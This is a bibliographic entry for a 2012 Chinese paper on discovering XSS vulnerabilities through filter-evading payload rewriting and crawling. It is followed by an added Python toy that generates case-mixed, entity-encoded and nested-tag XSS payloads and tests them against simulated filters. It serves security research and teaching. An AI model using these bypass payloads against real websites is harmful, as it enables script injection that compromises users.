
Technique for Deep Discovering XSS Vulnerability Based on Anti-Filter Rules Set and Automatic Crawler Program
Original title: 基于反过滤规则集和自动爬虫的XSS漏洞深度挖掘技术
Cited by: 12
Abstract: To address cross-site scripting (XSS) attacks against Web sites, the characteristics of XSS vulnerabilities and the filtering methods applied against them are analysed, and an XSS vulnerability discovery technique is proposed. First, an anti-filter rule set converts the XSS code into filter-evading forms; then an automatic crawler program injects the converted code and tests whether it remains usable. The method yields both the working transformed form of the XSS code and the injection point at which it takes effect, enabling deep discovery of XSS vulnerabilities in Web sites. Its effectiveness has been verified in practice by discovering XSS vulnerabilities in web-mail systems and detecting them in Web sites.
Source: Transactions of Beijing Institute of Technology (北京理工大学学报), 2012, No. 4, pp. 395-401 (7 pages). Indexed in EI, CAS, CSCD and the Peking University core journal list.
Fund: National Natural Science Foundation of China, project 60873008.
Keywords: cross-site; XSS anti-filter (anti-XSS rules set); XSS vulnerability discovery technique; automatic crawler
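The abstract describes a two-stage loop: a rule set rewrites a known XSS payload into forms meant to slip past a target's filter, then each rewritten form is injected and checked for whether it would still execute. The following is an added example illustrating that loop, not code from the paper or its authors. The filters, the four rewriting rules and the two seed payloads are constructed for the example; in a real run the filter is the remote application and the injection is done by the crawler. The usability check mimics one browser detail a practitioner must get right: character references such as `&#97;` are decoded inside event-handler attributes but not inside a `<script>` body, so the same rewrite counts as usable in one context and not the other.

```python
"""Toy XSS anti-filter rule set with an execution-usability check.

Constructed example: the filters below stand in for a target's input
sanitiser; rules and seed payloads are illustrative, not a complete set.
"""
import html
import re
from itertools import permutations

# Seed payloads (constructed). 'alert(' is the marker we look for afterwards.
BASE_PAYLOADS = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
]


def _mix(s):
    # Alternate case: "script" -> "sCrIpT"
    return "".join(c.upper() if i % 2 else c for i, c in enumerate(s))


# --- anti-filter rules: each maps a payload string to a rewritten one -------

def rule_raw(p):
    return p


def rule_case_mix(p):
    # HTML tag and attribute names are case-insensitive for the browser,
    # but a case-sensitive string match in a filter misses the mixed form.
    return re.sub(r"(?<=<)/?[a-z]+|\bon[a-z]+(?==)", lambda m: _mix(m.group(0)), p)


def rule_entity_in_handler(p):
    # Inside an attribute value the browser decodes &#97; to 'a' before the
    # handler runs; this does NOT happen inside a <script> body.
    return re.sub(r"(\bon[a-z]+=)alert", r"\1&#97;lert", p, flags=re.I)


def rule_nested_tag(p):
    # Defeats filters that delete "<script>" in one non-recursive pass.
    return p.replace("<script>", "<scr<script>ipt>").replace("</script>", "</scr</script>ipt>")


RULES = [rule_raw, rule_case_mix, rule_entity_in_handler, rule_nested_tag]


def generate_variants(payload):
    """Yield (rule_chain_name, rewritten_payload) for single rules and ordered pairs."""
    seen = set()
    chains = [(r,) for r in RULES] + list(permutations(RULES[1:], 2))
    for chain in chains:
        out = payload
        for rule in chain:
            out = rule(out)
        if out not in seen:
            seen.add(out)
            yield "+".join(r.__name__ for r in chain), out


# --- simulated target filters (constructed) --------------------------------

def filter_strip_script_once(s):
    # Removes <script>/</script> in a single pass: bypassable by nesting.
    return re.sub(r"</?script>", "", s, flags=re.I)


def filter_keyword_reject(s):
    # Rejects input containing obvious keywords; blind to character references.
    return "" if re.search(r"<script|alert", s, re.I) else s


def filter_escape(s):
    # The correct fix for an HTML text context: encode output, do not blacklist.
    return html.escape(s, quote=True)


# --- usability check: would the filtered output still run our marker? ------

SCRIPT_BODY = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
HANDLER = re.compile(r"<[a-z][^>]*?\bon[a-z]+\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)", re.I)


def is_executable(markup):
    """Approximate browser interpretation of the filtered markup.

    Script bodies are raw text (no entity decoding); event-handler attribute
    values are entity-decoded. Only a real '<' opens an element.
    """
    if any("alert(" in m.group(1) for m in SCRIPT_BODY.finditer(markup)):
        return True
    return any("alert(" in html.unescape(m.group(1).strip("\"'"))
               for m in HANDLER.finditer(markup))


def discover(filter_fn, payloads=BASE_PAYLOADS):
    """Push every variant through the filter; keep those that still execute.

    Returns a list of (rule_chain, injected_payload, filtered_output).
    """
    hits = []
    for p in payloads:
        for chain, variant in generate_variants(p):
            out = filter_fn(variant)
            if is_executable(out):
                hits.append((chain, variant, out))
    return hits


if __name__ == "__main__":
    for f in (filter_strip_script_once, filter_keyword_reject, filter_escape):
        print(f.__name__)
        for chain, variant, out in discover(f):
            print(f"  {chain:40} {variant!r} -> {out!r}")
```

Running the block shows the nesting rule surviving the strip-once filter, the entity rule surviving the keyword filter, and nothing surviving output encoding; each hit records which rule chain produced the working form, which is the data the abstract says the method yields alongside the injection point.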
